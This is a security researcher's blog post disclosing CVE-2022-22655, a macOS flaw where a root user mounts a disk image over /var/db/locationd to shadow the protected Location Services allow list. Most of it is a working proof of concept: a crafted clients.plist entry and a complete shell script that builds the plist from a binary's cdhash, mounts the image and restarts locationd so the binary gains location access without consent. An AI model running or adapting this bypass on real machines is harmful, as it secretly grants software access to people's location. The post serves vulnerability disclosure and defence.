This is a quick blog post about a vulnerability I covered in our Black Hat Europe 2022 talk with Wojciech Regula.

Contrary to what one would expect, the list of clients allowed to access Location Services is not kept in one of the TCC databases (TCC.db), but in a separate file maintained by locationd. Howard Oakley also covered this recently in his blog post Privacy: what TCC does and doesn't.

The Location Services client allow list lives in /var/db/locationd/clients.plist. The file is protected by the sandbox (TCC policy), so we cannot modify it to add a new client even with root privileges.

However, the /var/db/locationd/ directory itself is not protected against being used as a mount point. The protection applies to the file at that path, not to what is mounted on top of the directory. We can therefore create a disk image containing our own clients.plist and mount it over the directory, which shadows the original file without ever writing to it. Once locationd is restarted it reads the client list from the mounted image, and the new list takes effect. This bypasses the TCC protection of locationd's allow list.

To demonstrate access I used Justin Bui’s SwiftLiverpool tool.

The POC drops the compiled swiftliverpool binary and grants it access in a custom PLIST file. It then creates a disk image containing that file and mounts it over the directory. It must be run as root, because only root can mount over the directory.

The important entry in the custom PLIST file is the following; it is what grants the executable access to Location Services. The Requirement key ties the authorization to the binary's code directory hash (cdhash), so the hash has to match the dropped binary exactly.

	<key>com.apple.locationd.executable-</key>
	<dict/>
	<key>com.apple.locationd.executable-/private/tmp/swiftliverpool</key>
	<dict>
		<key>Authorized</key>
		<true/>
		<key>BundleId</key>
		<string>com.apple.locationd.executable-/private/tmp/swiftliverpool</string>
		<key>Executable</key>
		<string>/private/tmp/swiftliverpool</string>
		<key>Registered</key>
		<string>/private/tmp/swiftliverpool</string>
		<key>Requirement</key>
		<string>cdhash H"39fed059b420f6077761625e2f87b583eae49e88"</string>
	</dict>
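Putting the steps above together, here is an added shell script that stages a clients.plist with the entry shown, builds a disk image from it, mounts the image over /var/db/locationd and restarts locationd. This is example code written for this post, not the author's POC from the gist; the staging folder, image path and the use of codesign -dvvv to read the CDHash are my assumptions, and the plist contains only the keys shown above.

```shell
#!/bin/sh
# Added example of the mount-over-/var/db/locationd technique. Not the original POC;
# TARGET_BIN, STAGE_DIR and IMAGE defaults are assumptions made for illustration.
set -eu

TARGET_BIN="${TARGET_BIN:-/private/tmp/swiftliverpool}"  # binary to authorise for Location Services
STAGE_DIR="${STAGE_DIR:-/tmp/locationd_stage}"           # folder that becomes the image's contents
IMAGE="${IMAGE:-/tmp/locationd.dmg}"
MOUNT_POINT="/var/db/locationd"                           # directory shadowed by the mount

# Key locationd uses for a bare (non-bundled) executable in clients.plist.
client_key() {
	printf 'com.apple.locationd.executable-%s' "$1"
}

# Emit a minimal clients.plist authorising a single executable with the given cdhash.
# Only the keys visible in the post are included; the surrounding plist is constructed here.
make_clients_plist() {
	path="$1"; cdhash="$2"; key=$(client_key "$path")
	cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>com.apple.locationd.executable-</key>
	<dict/>
	<key>${key}</key>
	<dict>
		<key>Authorized</key>
		<true/>
		<key>BundleId</key>
		<string>${key}</string>
		<key>Executable</key>
		<string>${path}</string>
		<key>Registered</key>
		<string>${path}</string>
		<key>Requirement</key>
		<string>cdhash H"${cdhash}"</string>
	</dict>
</dict>
</plist>
EOF
}

# CDHash of a signed Mach-O, parsed from codesign's verbose output (macOS only).
cdhash_of() {
	codesign -dvvv "$1" 2>&1 | awk -F= '/^CDHash=/ { print $2; exit }'
}

# Build a writable image from the staging folder, mount it on top of /var/db/locationd
# and restart locationd so it re-reads clients.plist from the mounted image.
mount_over_locationd() {
	[ "$(id -u)" -eq 0 ] || { echo "must run as root to mount over $MOUNT_POINT" >&2; return 1; }
	cdhash=$(cdhash_of "$TARGET_BIN")
	[ -n "$cdhash" ] || { echo "no CDHash for $TARGET_BIN; is it signed?" >&2; return 1; }
	rm -rf "$STAGE_DIR"; mkdir -p "$STAGE_DIR"
	make_clients_plist "$TARGET_BIN" "$cdhash" > "$STAGE_DIR/clients.plist"
	plutil -lint "$STAGE_DIR/clients.plist"
	hdiutil create -ov -format UDRW -fs HFS+ -volname locationd -srcfolder "$STAGE_DIR" "$IMAGE"
	hdiutil attach "$IMAGE" -mountpoint "$MOUNT_POINT" -nobrowse
	killall locationd   # launchd respawns it with the shadowed clients.plist in effect
}

# Undo: detaching the image uncovers the untouched original directory and clients.plist.
unmount_locationd() {
	hdiutil detach "$MOUNT_POINT"
}

case "${1:-}" in
	mount)   mount_over_locationd ;;
	unmount) unmount_locationd ;;
esac
```

Run it as `sudo sh poc.sh mount` on an affected macOS version after placing a signed (ad-hoc is enough) swiftliverpool at /private/tmp, then `sudo sh poc.sh unmount` to detach. Note that the mount only shadows the directory: the protected clients.plist is never modified, which is exactly why the file-level TCC protection does not help here, and why anything checking the allow list should also check what is mounted at that path.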

POC:

CVE-2022-22655 - macOS Location Services Bypass · GitHub